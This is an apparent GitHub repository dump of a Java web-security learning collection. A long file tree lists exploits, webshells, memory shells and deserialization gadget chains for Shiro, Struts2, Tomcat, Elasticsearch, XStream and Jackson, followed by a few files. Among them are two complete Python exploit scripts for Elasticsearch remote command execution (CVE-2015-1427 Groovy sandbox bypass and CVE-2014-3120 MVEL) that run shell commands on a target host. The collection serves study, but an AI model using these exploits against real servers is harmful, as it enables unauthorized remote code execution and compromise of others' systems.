├── BypassSM ├── Readme.md ├── check.txt ├── learn │ ├── bypass_sm.jar │ └── eviljar │ │ ├── pom.xml │ │ ├── src │ │ └── main │ │ │ └── java │ │ │ └── bypass_sm.java │ │ └── target │ │ ├── classes │ │ └── bypass_sm.class │ │ ├── eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar │ │ ├── eviljar-1.0-SNAPSHOT.jar │ │ ├── maven-archiver │ │ └── pom.properties │ │ └── maven-status │ │ └── maven-compiler-plugin │ │ └── compile │ │ └── default-compile │ │ ├── createdFiles.lst │ │ └── inputFiles.lst └── policy │ └── custom.policy ├── Dubbo └── Readme.md ├── Elasticsearch ├── ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427) │ └── exp.py ├── ElasticSearch 命令执行漏洞(CVE-2014-3120) │ └── exp.py ├── ElasticSearch 插件目录穿越漏洞(CVE-2015-3337) │ └── exp.py ├── ElasticSearch 目录穿越漏洞(CVE-2015-5531) │ └── exp.py ├── Elasticsearch写入webshell漏洞(WooYun-2015-110216) │ └── exp.py └── README.md ├── JNI ├── Readme.md ├── jni.iml ├── jni │ ├── cmd.dll │ ├── jni.h │ ├── jni_md.h │ ├── org_javaweb_jni_CommandExecution.cpp │ ├── org_javaweb_jni_CommandExecution.h │ ├── webshell │ │ ├── jni.h │ │ ├── jni_md.h │ │ ├── libtest.dll │ │ ├── org_apache_jsp_test_jsp.h │ │ ├── org_apache_jsp_test_jsp_JniClass.c │ │ ├── org_apache_jsp_test_jsp_JniClass.h │ │ └── 命令.txt │ └── 命令.txt ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── org │ │ ├── apache │ │ └── jsp │ │ │ └── test_jsp.java │ │ └── javaweb │ │ └── jni │ │ ├── CommandExecution.java │ │ └── CommandExecutionTest.java ├── target │ └── classes │ │ └── org │ │ ├── apache │ │ └── jsp │ │ │ ├── test_jsp$JniClass.class │ │ │ └── test_jsp.class │ │ └── javaweb │ │ └── jni │ │ ├── CommandExecution.class │ │ ├── CommandExecutionTest$1.class │ │ └── CommandExecutionTest.class └── wz.txt ├── Jboss ├── CVE-2017-12149 │ ├── README.md │ └── image-20210401130731439.png ├── CVE-2017-7504 │ └── README.md ├── JMXInvokerServlet-deserialization │ └── README.md └── README.md ├── Jdbc ├── CVE-2021-2471 │ ├── Readme.md │ └── img │ │ ├── image-20211022135316052.png │ │ ├── 
image-20211022135425801.png │ │ ├── image-20211022140911655.png │ │ ├── image-20211022141357429.png │ │ ├── image-20211022141453082.png │ │ ├── image-20211022141712911.png │ │ ├── image-20211022142111106.png │ │ └── image-20211022142331574.png ├── Readme.md └── img │ ├── 1.png │ ├── 2.png │ └── Readme.md ├── Jenkins └── Readme.md ├── MyBatis └── Readme.md ├── RASP └── Readme.md ├── README.md ├── Shiro ├── CVE-2020-1957.pdf ├── README.md ├── Shiro权限绕过 │ ├── HELP.md │ ├── Readme.md │ ├── Shiro权限.iml │ ├── mvnw │ ├── mvnw.cmd │ ├── pom.xml │ ├── src │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── shiro │ │ │ │ └── vuln │ │ │ │ ├── Controller │ │ │ │ └── UserController.java │ │ │ │ ├── Shiro │ │ │ │ ├── MainRealm.java │ │ │ │ └── ShiroConfig.java │ │ │ │ └── VulnApplication.java │ │ │ └── resources │ │ │ └── application.properties │ └── target │ │ └── classes │ │ ├── application.properties │ │ └── com │ │ └── shiro │ │ └── vuln │ │ ├── Controller │ │ └── UserController.class │ │ ├── Shiro │ │ ├── MainRealm.class │ │ └── ShiroConfig.class │ │ └── VulnApplication.class ├── shiro550 │ ├── HELP.md │ ├── cc11 │ ├── key.txt │ ├── mvnw │ ├── mvnw.cmd │ ├── payload │ ├── pom.xml │ ├── shiro550.iml │ ├── src │ │ ├── main │ │ │ ├── java │ │ │ │ └── com │ │ │ │ │ └── firebasky │ │ │ │ │ ├── Controller │ │ │ │ │ └── UserController.java │ │ │ │ │ ├── Shiro550Application.java │ │ │ │ │ ├── exp │ │ │ │ │ ├── AESencode.java │ │ │ │ │ ├── CommonCollection11.java │ │ │ │ │ ├── Main.java │ │ │ │ │ ├── ScanShiro.java │ │ │ │ │ └── exp.py │ │ │ │ │ └── shiro │ │ │ │ │ ├── MainRealm.java │ │ │ │ │ └── ShiroConfig.java │ │ │ └── resources │ │ │ │ └── application.properties │ │ └── test │ │ │ └── java │ │ │ └── com │ │ │ └── firebasky │ │ │ └── Shiro550ApplicationTests.java │ └── target │ │ ├── classes │ │ ├── application.properties │ │ └── com │ │ │ └── firebasky │ │ │ ├── Controller │ │ │ └── UserController.class │ │ │ ├── Shiro550Application.class │ │ │ ├── exp │ │ │ ├── 
AESencode.class │ │ │ ├── CommonCollection11.class │ │ │ ├── Main.class │ │ │ └── ScanShiro.class │ │ │ └── shiro │ │ │ ├── MainRealm.class │ │ │ └── ShiroConfig.class │ │ └── test-classes │ │ └── com │ │ └── firebasky │ │ └── Shiro550ApplicationTests.class └── shiro721 │ ├── HELP.md │ ├── mvnw │ ├── mvnw.cmd │ ├── pom.xml │ ├── shiro721.iml │ ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── firebasky │ │ │ │ └── shiro721 │ │ │ │ ├── Shiro721Application.java │ │ │ │ ├── config │ │ │ │ ├── MyRealm.java │ │ │ │ └── ShiroConfig.java │ │ │ │ ├── controllers │ │ │ │ ├── LoginController.java │ │ │ │ └── index.java │ │ │ │ └── exp │ │ │ │ ├── exp.py │ │ │ │ └── url.ser │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── firebasky │ │ └── shiro721 │ │ └── Shiro721ApplicationTests.java │ └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── firebasky │ │ └── shiro721 │ │ ├── Shiro721Application.class │ │ ├── config │ │ ├── MyRealm.class │ │ └── ShiroConfig.class │ │ └── controllers │ │ ├── LoginController.class │ │ └── index.class │ └── test-classes │ └── com │ └── firebasky │ └── shiro721 │ └── Shiro721ApplicationTests.class ├── SnakeYaml ├── SnakeYaml.iml ├── pom.xml ├── src │ └── main │ │ └── java │ │ ├── CVE │ │ ├── PoC.java │ │ ├── gadget.java │ │ └── poc.txt │ │ ├── learn │ │ ├── Person.java │ │ ├── test.java │ │ └── 学习.txt │ │ └── trick │ │ └── SnakeYaml.java └── target │ └── classes │ ├── CVE │ ├── PoC.class │ └── gadget.class │ ├── learn │ ├── Person.class │ └── test.class │ └── trick │ └── SnakeYaml.class ├── Solr ├── Apache Solr 任意文件读取漏洞 │ ├── README.md │ └── apache solr未授权读文件exp.py └── README.md ├── Spring ├── CVE-2016-4977-spring │ ├── CVE-2016-4977.assets │ │ ├── image-20210219224825746.png │ │ ├── image-20210219224902858.png │ │ ├── image-20210219225556986.png │ │ ├── image-20210219225716796.png │ │ ├── image-20210219231451748.png │ │ ├── image-20210219231819148.png │ │ ├── 
image-20210219231847037.png │ │ ├── image-20210219232049395.png │ │ ├── image-20210219232204534.png │ │ ├── image-20210219232632661.png │ │ ├── image-20210219233138950.png │ │ ├── image-20210219233417903.png │ │ ├── image-20210220010536341.png │ │ ├── image-20210220010626981.png │ │ ├── image-20210220010854625.png │ │ ├── image-20210220010924079.png │ │ ├── image-20210220011027192.png │ │ ├── image-20210220011825279.png │ │ ├── image-20210220012116264.png │ │ ├── image-20210220012500083.png │ │ ├── image-20210220012822337.png │ │ ├── image-20210220013530679.png │ │ ├── image-20210220013647485.png │ │ ├── image-20210220013838006.png │ │ ├── image-20210220014127250.png │ │ ├── image-20210220014259943.png │ │ ├── image-20210220014620317.png │ │ └── image-20210220014702074.png │ ├── CVE-2016-4977.md │ ├── CVE-2016-4977.pdf │ └── cve-2016-4977 │ │ └── spring-oauth2-sec-bug │ │ ├── demo.iml │ │ ├── pom.xml │ │ ├── src │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── DemoApplication.java │ │ │ └── resources │ │ │ └── application.properties │ │ └── target │ │ └── classes │ │ ├── application.properties │ │ └── com │ │ └── example │ │ └── DemoApplication.class ├── CVE-2017-4971-spring │ ├── CVE-2017-4971分析.assets │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 4.png │ │ ├── image-20210218194441152.png │ │ ├── image-20210218194733254.png │ │ ├── image-20210218200153046.png │ │ ├── image-20210218201238194.png │ │ ├── image-20210218201936295.png │ │ ├── image-20210218202011507.png │ │ ├── image-20210218202450134.png │ │ ├── image-20210218203221151.png │ │ ├── image-20210218203901093.png │ │ ├── image-20210218203953533.png │ │ ├── image-20210218204058653.png │ │ ├── image-20210218204423476.png │ │ ├── image-20210218204746269.png │ │ ├── image-20210218205407984.png │ │ ├── image-20210218205644634.png │ │ ├── image-20210218205752547.png │ │ ├── image-20210218210007792.png │ │ ├── image-20210218210058692.png │ │ ├── image-20210218210510086.png │ │ ├── 
image-20210218210700708.png │ │ ├── image-20210218210826600.png │ │ └── t01d4c3b8e8b53a2fba.png │ ├── CVE-2017-4971分析.md │ └── CVE-2017-4971分析.pdf ├── CVE-2017-8046-spring │ └── complete │ │ ├── CVE-2017-8046分析.assets │ │ ├── image-20210218140900669.png │ │ ├── image-20210218140952456.png │ │ ├── image-20210218141130874.png │ │ ├── image-20210218141757004.png │ │ ├── image-20210218141906222.png │ │ ├── image-20210218142031222.png │ │ ├── image-20210218142324101.png │ │ ├── image-20210218142345087.png │ │ ├── image-20210218142403072.png │ │ ├── image-20210218143536948.png │ │ ├── image-20210218143749562.png │ │ ├── image-20210218143913364.png │ │ ├── image-20210218144011160.png │ │ ├── image-20210218144046479.png │ │ ├── image-20210218144138429.png │ │ ├── image-20210218144321822.png │ │ ├── image-20210218144405693.png │ │ ├── image-20210218144455906.png │ │ ├── image-20210218154218728.png │ │ ├── image-20210218154242121.png │ │ ├── image-20210218154309595.png │ │ ├── image-20210218154343073.png │ │ ├── image-20210218154922515.png │ │ ├── image-20210218155012734.png │ │ ├── image-20210218155828334.png │ │ ├── image-20210218155904249.png │ │ ├── image-20210218155949892.png │ │ ├── image-20210218160152994.png │ │ ├── image-20210218160229390.png │ │ ├── image-20210218160352066.png │ │ ├── image-20210218160446520.png │ │ ├── image-20210218160527668.png │ │ └── image-20210218160715149.png │ │ ├── CVE-2017-8046分析.md │ │ ├── CVE-2017-8046分析.pdf │ │ ├── accessing-data-rest.iml │ │ ├── build.gradle │ │ ├── build │ │ ├── classes │ │ │ └── java │ │ │ │ ├── main │ │ │ │ ├── EZvulhub │ │ │ │ │ ├── Main.class │ │ │ │ │ └── SpELTest.class │ │ │ │ └── com │ │ │ │ │ └── example │ │ │ │ │ └── accessingdatarest │ │ │ │ │ ├── AccessingDataRestApplication.class │ │ │ │ │ ├── Person.class │ │ │ │ │ └── PersonRepository.class │ │ │ │ └── test │ │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── accessingdatarest │ │ │ │ └── AccessingDataRestApplicationTests.class │ │ └── tmp │ │ │ ├── 
compileJava │ │ │ └── source-classes-mapping.txt │ │ │ └── compileTestJava │ │ │ └── source-classes-mapping.txt │ │ ├── gradle │ │ └── wrapper │ │ │ ├── gradle-wrapper.jar │ │ │ └── gradle-wrapper.properties │ │ ├── gradlew │ │ ├── gradlew.bat │ │ ├── mvnw │ │ ├── mvnw.cmd │ │ ├── pom.xml │ │ ├── settings.gradle │ │ └── src │ │ ├── main │ │ └── java │ │ │ ├── EZvulhub │ │ │ ├── Main.java │ │ │ ├── SpELTest.java │ │ │ └── test.java │ │ │ └── com │ │ │ └── example │ │ │ └── accessingdatarest │ │ │ ├── AccessingDataRestApplication.java │ │ │ ├── Person.java │ │ │ └── PersonRepository.java │ │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── accessingdatarest │ │ └── AccessingDataRestApplicationTests.java ├── CVE-2018-1270-SPEL │ ├── CVE-2018-1270-master │ │ └── CVE-2018-1270-master │ │ │ ├── README.md │ │ │ ├── demo.iml │ │ │ ├── mvnw │ │ │ ├── mvnw.cmd │ │ │ ├── pom.xml │ │ │ └── src │ │ │ └── main │ │ │ └── java │ │ │ └── com │ │ │ └── venscor │ │ │ └── demo │ │ │ ├── Bean │ │ │ ├── Greeting.java │ │ │ └── HelloMessage.java │ │ │ ├── Controller │ │ │ └── GreetingController.java │ │ │ ├── SpringmessagespelApplication.java │ │ │ └── WebSocketConfig.java │ ├── CVE-2018-1270.pdf │ ├── Readme.md │ └── 分析.assets │ │ ├── 012A8071.png │ │ ├── 1.gif │ │ ├── image-20210220152220717.png │ │ ├── image-20210220154332152.png │ │ ├── image-20210220154922801.png │ │ ├── image-20210220160150498.png │ │ ├── image-20210220160459956.png │ │ ├── image-20210220161508697.png │ │ ├── image-20210220161825423.png │ │ ├── image-20210220161931650.png │ │ ├── image-20210220162251047.png │ │ └── 未命名-副本.gif ├── Readme.md └── spring-aop底层.pdf ├── Springboot └── Readme.md ├── Springcolud └── Readme.md ├── Struts2 ├── README.md ├── Struts2-001 │ ├── Struts001.java │ ├── Struts02-001简单分析.pdf │ ├── index.jsp │ ├── pom.xml │ ├── struts.xml │ └── web.xml ├── Struts2-002 │ ├── Struts02-002简单分析.pdf │ └── index.jsp ├── Struts2-004 │ └── README.md ├── Struts2-005 │ └── README.md ├── Struts2-007 │ 
├── Struts007.java │ ├── Struts2-007简单分析.pdf │ ├── UserAction-validation.xml │ ├── index.jsp │ ├── struts.xml │ └── welcome.jsp ├── Struts2-008 │ └── README.md ├── Struts2-009 │ ├── 1.png │ └── README.md ├── Struts2-012 │ └── README.md ├── Struts2-013 │ └── README.md ├── Struts2-016 │ └── README.md ├── Struts2-045 │ └── README.md ├── Struts2-046 │ └── README.md └── img │ ├── README.md │ └── 环境.png ├── Weblogic ├── Readme.md └── img │ ├── image-20210815001234456.png │ ├── image-20210815103726507.png │ ├── image-20210815103750342.png │ ├── image-20210815110026954.png │ ├── image-20210815110029190.png │ └── image-20210815153940829.png ├── Xstream ├── Readme.md └── exp │ ├── CSRF │ └── CVE-2021-21349.xml │ ├── DOS │ ├── CVE-2017-7957.xml │ └── CVE-2021-21348.xml │ ├── RCE │ ├── CVE-2013-7285-2.xml │ ├── CVE-2013-7285.xml │ ├── CVE-2019-10173.xml │ ├── CVE-2020-26217.xml │ ├── CVE-2021-21344.xml │ ├── CVE-2021-21345.xml │ ├── CVE-2021-21346.xml │ ├── CVE-2021-21347.xml │ ├── CVE-2021-21350.xml │ ├── CVE-2021-21351.xml │ ├── CVE-2021-29505.xml │ ├── CVE-2021-39141.xml │ ├── CVE-2021-39144.xml │ └── CVE-2021-39146.xml │ └── XXE │ └── CVE-2016-3674.xml ├── jackson ├── inject.sql ├── jackson.iml ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── firebasky │ │ ├── cve │ │ ├── CVE_2019_12086.java │ │ ├── CVE_2019_12384.java │ │ ├── CVE_2019_12814.java │ │ ├── CVE_2019_14379.java │ │ ├── CVE_2019_14439.java │ │ ├── CVE_2020_35490.java │ │ ├── CVE_2020_36187.java │ │ └── 黑名单.txt │ │ ├── learn │ │ ├── Man.java │ │ ├── test.java │ │ └── test_poc.java │ │ └── self │ │ └── hikaricp.java ├── target │ └── classes │ │ └── com │ │ └── firebasky │ │ ├── cve │ │ ├── CVE_2019_12086.class │ │ ├── CVE_2019_12384.class │ │ ├── CVE_2019_12814.class │ │ ├── CVE_2019_14379.class │ │ ├── CVE_2019_14439.class │ │ ├── CVE_2020_35490.class │ │ └── CVE_2020_36187.class │ │ ├── learn │ │ ├── Man.class │ │ ├── test.class │ │ └── test_poc.class │ │ └── self │ │ └── hikaricp.class └── xxe │ 
├── evil.dtd │ └── exp.xml ├── java-web ├── README.md ├── java安全之java-web.pdf └── java文件漏洞检查.md ├── java内存马 ├── Readme.md ├── Tomcat Filter │ ├── Readme.md │ └── Tomcat Filter.rar └── agent │ └── java-agent学习.pdf ├── java回显 ├── GlassFish │ └── Echo_Request.java ├── HELP.md ├── Readme.md ├── WildFly │ └── Echo_ServletRequestContext.java ├── java回显.iml ├── jetty │ └── Echo_HttpConnection.java ├── mvnw ├── mvnw.cmd ├── pom.xml ├── resin │ └── Echo_HttpRequest.java └── src │ ├── main │ ├── java │ │ └── com │ │ │ └── firebasky │ │ │ └── echo │ │ │ ├── EchoApplication.java │ │ │ ├── controller │ │ │ ├── Alltomcat.java │ │ │ ├── MBeanServer.java │ │ │ ├── Tomcat.java │ │ │ ├── demo.java │ │ │ ├── socket.java │ │ │ ├── socket_v2.java │ │ │ ├── springmvc.java │ │ │ └── webshell │ │ │ │ └── tomcat.java │ │ │ └── evilclass │ │ │ ├── springmvc.java │ │ │ ├── tomcat72.java │ │ │ ├── tomcat82.java │ │ │ ├── tomcat_v1.java │ │ │ ├── tomcat_v2.java │ │ │ ├── tomcat_v3.java │ │ │ └── webshell.java │ └── resources │ │ └── application.properties │ └── test │ └── java │ └── com │ └── firebasky │ └── echo │ └── EchoApplicationTests.java ├── java安全基础 ├── Java class文件格式.pdf ├── README.md ├── java内部类.pdf ├── java反射.pdf ├── java基础.pdf └── 反射newInstance的使用方式.md ├── java小型框架 ├── Readme.md ├── code │ └── CVE_2018_19178.java ├── img │ ├── CVE-2019-9615.png │ └── Readme.md ├── java代码审计之租车系统.pdf ├── java危险函数.md └── 代码审计基础.pdf ├── java序列化基础 ├── ClassLoader(类加载机制).pdf ├── Java反射机制2.pdf ├── README.md └── java反射机制.pdf ├── java序列化链 ├── AspectJWeaver │ └── AspectJWeaver.java ├── C3P0 │ ├── Readme.md │ └── payload1.java ├── Click │ └── payload.java ├── Clojure │ ├── Clojure.java │ └── SerializeUtil.java ├── CommonsBeanutils │ └── CommonsBeanutils1.java ├── FileUpload │ ├── FileUploadForCopy.java │ └── FileUploadForWrite.java ├── Groovy │ └── Groovy.java ├── Hibernate │ ├── Hibernate1.java │ └── Hibernate2.java ├── Java反序列化入门之URLDNS链.pdf ├── Mojarra │ └── Readme.md ├── README.md ├── ROME │ ├── Rome.java 
│ └── Rome2.java ├── Tools │ └── SerializeUtil.java ├── Vaadin │ └── Vaadin.java ├── spring │ ├── spring1.java │ └── spring2.java └── xmldecoder │ ├── Readme.md │ ├── exp1.xml │ ├── exp2.xml │ ├── exp3.xml │ └── main.java ├── java日常 ├── Readme.md ├── SPI机制.md ├── Thinking_in_java高级之volatile.md ├── img │ ├── image-20210818111820181.png │ ├── jep290.png │ ├── readobject.jpg │ ├── xxe.png │ └── 反射.png ├── java-fix序列化漏洞.md ├── java-maven打包学习.md ├── javabean与内省.md ├── java写文件rce.md ├── java协议.md ├── java反序列化编码绕过.md ├── java执行js导致命令执行.pdf ├── marshalsec.md ├── readobject深入.md ├── searchobj.md ├── wsdl.md ├── yso搭建.md ├── 反射newInstance的使用方式.md ├── 构造java探测class反序列化gadget的思考.md └── 闲谈log4j2.md ├── java模板注入 ├── Beetl │ └── exp.txt ├── FreeMarker │ └── exp.txt ├── Readme.md ├── Thymeleaf │ └── exp.txt ├── Velocity │ ├── exp.txt │ └── pom.xml ├── exp.txt └── jsp │ └── test.jsp ├── java面向对象练习一.pdf ├── jndi-gadgets.md ├── shell ├── EL │ └── test.java ├── Elasticsearch_MVEL │ ├── demo.java │ └── pom.xml ├── Expression │ ├── test.java │ └── test.jsp ├── JNDI │ └── test.java ├── JNI │ ├── CommandExecution.java │ └── test.jsp ├── Jexl │ ├── demo.java │ └── pom.xml ├── Jshell │ └── test.java ├── OGNL │ ├── Readme.md │ ├── demo.java │ └── pom.xml ├── Readme.md ├── SPEL │ └── Readme.md ├── ScriptEngineManager │ ├── Readme.md │ ├── java-scripting-programmers-guide.pdf │ ├── main.java │ ├── shell.jsp │ ├── shell2.jsp │ └── test.java ├── bypass │ ├── servertableentry.java │ ├── test.java │ ├── test2.java │ ├── test3.java │ └── test4.java ├── jndi │ ├── client.jsp │ └── yso.txt ├── jrmp │ ├── client.jsp │ └── exp.txt ├── loadjar │ ├── Evil.java │ └── server.jsp └── rmi-registry-bind │ ├── server.jsp │ └── yso.txt ├── spring-bug ├── CVE-2016-4977.pdf ├── CVE-2017-4971分析.pdf ├── CVE-2017-8046分析.pdf ├── CVE-2018-1270.pdf └── README.md └── tomcat ├── CVE-2017-12615Tomcat远程代码执行漏洞 ├── README.md └── exp.py ├── CVE-2019-0232 Apache Tomcat远程代码执行漏洞 └── README.md ├── CVE-2020-13942 Apache Unomi 
远程代码执行漏洞 ├── CVE-2020-13942-exp.py └── README.md ├── CVE-2020-1938文件包含漏洞 ├── CVE-2020-1938-exp.py └── README.md ├── README.md ├── Tomcat后台弱口令漏洞 ├── README.md ├── shell.jsp └── shell.war └── img ├── 1.png └── README.md /BypassSM/check.txt: -------------------------------------------------------------------------------- 1 | checkAccept(String, int) 2 | checkAccess(Thread) 3 | checkAccess(ThreadGroup) 4 | checkAwtEventQueueAccess() 5 | checkConnect(String, int) 6 | checkConnect(String, int, Object) 7 | checkCreateClassLoader() 8 | checkDelete(String) 9 | checkExec(String) 10 | checkExit(int) 11 | checkLink(String) 12 | checkListen(int) 13 | checkMemberAccess(Class, int) 14 | checkMulticast(InetAddress) 15 | checkMulticast(InetAddress, byte) 16 | checkPackageAccess(String) 17 | checkPackageDefinition(String) 18 | checkPermission(Permission) 19 | checkPermission(Permission, Object) 20 | checkPrintJobAccess() 21 | checkPropertiesAccess() 22 | checkPropertyAccess(String) 23 | checkRead(FileDescriptor) 24 | checkRead(String) 25 | checkRead(String, Object) 26 | checkSecurityAccess(String) 27 | checkSetFactory() 28 | checkSystemClipboardAccess() 29 | checkTopLevelWindow(Object) 30 | checkWrite(FileDescriptor) 31 | checkWrite(String) -------------------------------------------------------------------------------- /BypassSM/learn/bypass_sm.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/bypass_sm.jar -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn 7 | org.example 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | eviljar 13 | 14 | 15 | 8 16 | 8 17 | 18 | 19 | 20 | 21 | org.apache.maven.plugins 22 | maven-assembly-plugin 23 | 2.5.5 24 | 25 | 26 | 27 | ErrorBaseExec 28 | 29 | 30 | 31 
| jar-with-dependencies 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/classes/bypass_sm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/classes/bypass_sm.class -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Wed Oct 20 19:27:56 CST 2021 3 | version=1.0-SNAPSHOT 4 | groupId=org.example 5 | artifactId=eviljar 6 | -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | bypass_sm.class 2 | -------------------------------------------------------------------------------- 
/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst -------------------------------------------------------------------------------- /BypassSM/policy/custom.policy: -------------------------------------------------------------------------------- 1 | grant { 2 | permission java.io.FilePermission "D:\\*", "read"; 3 | permission java.net.SocketPermission "www.baidu.com:1-", "connect,resolve"; 4 | }; -------------------------------------------------------------------------------- /Dubbo/Readme.md: -------------------------------------------------------------------------------- 1 | # Dubbo 2 | 3 | >Apache Dubbo 是伪装的、轻量级的Java RPC 服务框架。[RPC服务](https://www.zhihu.com/question/25536695) 4 | >[默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658) 5 | 6 | ### CVE-2019-17564 7 | >spring (spring-web(5.1.9.RELEASE)) 的httpinvoker 可能存在反序列化漏洞 [docs](https://docs.spring.io/spring-framework/docs/5.1.0.RELEASE/spring-framework-reference/integration.html#remoting-httpinvoker) 8 | 9 | http://www.lmxspace.com/2020/02/16/Apache-Dubbo%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/ 10 | 11 | https://www.mi1k7ea.com/2021/07/03/%E6%B5%85%E6%9E%90Dubbo-HttpInvokerServiceExporter%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/ 12 | 13 | ### CVE-2021-25641 14 | >Dubbo Provider即服务提供方默认使用dubbo协议来进行RPC通信,而dubbo协议默认是使用Hessian2序列化格式进行对象传输的,不过可以通过更改dubbo协议的第三个flag位字节来更改为使用Kryo或FST序列化格式来进行Dubbo Provider反序列化攻击从而绕过针对Hessian2反序列化相关的限制来达到RCE。 15 | 16 | https://www.mi1k7ea.com/2021/06/30/%E6%B5%85%E6%9E%90Dubbo-KryoFST%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2021-25641%EF%BC%89/ 
17 | 18 | ~~可以整理一个fastjson利用gadget~~ 19 | 20 | ### CVE-2021-30179 21 | 22 | https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg 23 | 24 | **个人认为CVE-2021-30179的主要思路就是Apache Dubbo在处理泛类引用时,提供了多种通过反序列化方式得到对象再生成pojo对象的选择。** 三梦师傅说跟这个思路扩大了反序列化挖掘思路 25 | 26 | ### Dubbo反序列化RCE利用之新拓展面 - Dubbo Rouge攻击客户端 27 | 28 | https://xz.aliyun.com/t/7354 29 | 30 | **文章中有一点非常强** 31 | ![image](https://user-images.githubusercontent.com/63966847/139078049-28694796-bb21-40fe-9e8d-38d96da29ab8.png) 32 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | #参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427 3 | import requests 4 | import json 5 | import urllib3 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | #解决ssl链接报错 9 | 10 | """ 11 | 本漏洞:1.是一个沙盒绕过;2.是一个Goovy代码执行漏洞。 12 | """ 13 | 14 | url = "http://ip" 15 | 16 | add = { 17 | "name": "Firebasky" 18 | } 19 | 20 | exp ={ 21 | "size":1, "script_fields": 22 | { 23 | "lupin": 24 | { 25 | "lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()" 26 | } 27 | } 28 | } 29 | 30 | add = json.dumps(add) 31 | exp = json.dumps(exp) 32 | headers = {"Content-type": "application/json","Accept": "*/*"} 33 | #需要添加一条数据 34 | requests.request("POST",url=url+"/website/blog/",data=add,verify=False,headers=headers) 35 | #执行命令 36 | r=requests.request("POST",url=url+"/_search?pretty",verify=False,data=exp,headers=headers) 37 | print(r.text) 38 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch 命令执行漏洞(CVE-2014-3120)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | 
#参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 3 | import requests 4 | import json 5 | import urllib3 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | #解决ssl链接报错 9 | 10 | """ 11 | 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作, 12 | 而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 13 | 14 | 影响版本:ElasticSearch 1.2之前的版本 15 | """ 16 | 17 | url = "http://ip" 18 | 19 | add = { 20 | "name": "Firebasky" 21 | } 22 | exp = { 23 | "size": 1, 24 | "query": { 25 | "filtered": { 26 | "query": { 27 | "match_all": { 28 | } 29 | } 30 | } 31 | }, 32 | "script_fields": { 33 | "command": { 34 | "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" 35 | } 36 | } 37 | } 38 | 39 | add = json.dumps(add) 40 | exp = json.dumps(exp) 41 | headers = {"Content-type": "application/json","Accept": "*/*"} 42 | #需要添加一条数据 43 | requests.request("POST",url=url+"/website/blog/",data=add,verify=False,headers=headers) 44 | #执行命令 45 | r=requests.request("POST",url=url+"/_search?pretty",verify=False,data=exp,headers=headers) 46 | print(r.text) 47 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch 插件目录穿越漏洞(CVE-2015-3337)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | 